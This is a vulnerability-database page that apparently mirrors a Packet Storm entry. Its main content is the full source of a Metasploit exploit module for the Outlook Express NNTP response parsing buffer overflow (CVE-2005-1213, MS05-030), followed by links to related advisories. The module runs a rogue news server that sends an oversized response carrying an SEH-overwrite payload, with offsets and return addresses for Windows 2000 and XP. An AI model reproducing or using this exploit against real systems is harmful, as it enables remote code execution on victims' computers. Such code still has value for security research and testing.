Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormMCPACKETSTORM:83025
HistoryNov 26, 2009 - 12:00 a.m.

Microsoft Outlook Express NNTP Response Parsing Buffer Overflow

2009-11-2600:00:00
MC
packetstormsecurity.com
23

0.974 High

EPSS

Percentile

99.9%

JSON
`##  
# $Id$  
##  
  
##  
# This file is part of the Metasploit Framework and may be subject to   
# redistribution and commercial restrictions. Please see the Metasploit  
# Framework web site for more information on licensing and terms of use.  
# http://metasploit.com/framework/  
##  
  
  
  
class Metasploit3 < Msf::Exploit::Remote  
  
include Msf::Exploit::Remote::TcpServer  
include Msf::Exploit::Remote::Seh  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'Microsoft Outlook Express NNTP Response Parsing Buffer Overflow',  
'Description' => %q{  
This module exploits a stack overflow in the news reader of Microsoft  
Outlook Express.  
},  
'Author' => 'MC',  
'License' => MSF_LICENSE,  
'Version' => '$Revision$',  
'References' =>   
[   
[ 'CVE', '2005-1213' ],  
[ 'OSVDB', '17306' ],  
[ 'BID', '13951' ],  
[ 'MSB', 'MS05-030' ],  
],  
'DefaultOptions' =>  
{  
'EXITFUNC' => 'process',  
},  
'Payload' =>  
{  
'Space' => 750,  
'BadChars' => "\x00",  
'MaxNops' => 0,  
'StackAdjustment' => -3500,  
'EncoderType' => Msf::Encoder::Type::AlphanumUpper,  
},  
'Platform' => 'win',  
'Targets' =>  
[  
['Windows 2000 English SP0-SP4', { 'Offset' => 9624, 'Ret' => 0x75022ac4 }],  
['Windows XP English SP0/SP1', { 'Offset' => 9596, 'Ret' => 0x71aa2461 }],  
],  
'Privileged' => false,  
'DisclosureDate' => 'Jun 14 2005',  
'DefaultTarget' => 0))  
  
register_options(  
[   
OptPort.new('SRVPORT', [ true, "The NNTPServer daemon port to listen on", 119 ])  
], self.class)  
end  
  
def on_client_connect(client)  
yup = "200\r\n"  
  
client.put(yup)  
client.put(yup)  
end  
  
def on_client_data(client)  
return if ((p = regenerate_payload(client)) == nil)  
  
filler = "215 list\r\n" + "group "   
filler << rand_text_english(target['Offset'])  
seh = generate_seh_payload(target.ret)  
sploit = filler + seh + " 1 y\r\n\.\r\n"  
  
print_status("Sending #{sploit.length} bytes to #{client.getpeername}:#{client.peerport}...")  
client.put(sploit)  
  
handler  
service.close_client(client)  
end  
  
end  
`

Related

checkpoint_advisories 2
securityvulns 2
cert 1
saint 4
seebug 1
cve 1
nessus 1
checkpoint_advisories
checkpoint_advisories
Microsoft Outlook Express NNTP handler Buffer Overflow (CVE-2005-1213)
2016-03-20 00:00:00
NNTP (CVE-2004-0574; CVE-2005-1213)
2005-07-06 00:00:00
securityvulns
securityvulns
Microsoft Security Bulletin MS05-030 Cumulative Security Update in Outlook Express &#40;897715&#41;
2005-06-15 00:00:00
iDEFENSE Security Advisory 06.14.05: Microsoft Outlook Express NNTP Response Parsing Buffer Overflow Vulnerability
2005-06-15 00:00:00
cert
cert
Microsoft Outlook Express vulnerable to remote code execution
2005-06-14 00:00:00
saint
saint
Outlook Express NNTP LIST buffer overflow
2006-05-04 00:00:00
Outlook Express NNTP LIST buffer overflow
2006-05-04 00:00:00
Outlook Express NNTP LIST buffer overflow
2006-05-04 00:00:00
seebug
seebug
MS Outlook Express NNTP Buffer Overflow Exploit (MS05-030)
2005-06-24 00:00:00
cve
cve
CVE-2005-1213
2005-06-14 04:00:00
nessus
nessus
MS05-030: Vulnerability in Outlook Express Could Allow Remote Code Execution (897715)
2005-06-14 00:00:00

0.974 High

EPSS

Percentile

99.9%

JSON
Related for PACKETSTORM:83025
checkpoint_advisories2securityvulns2cert1saint4seebug1cve1nessus1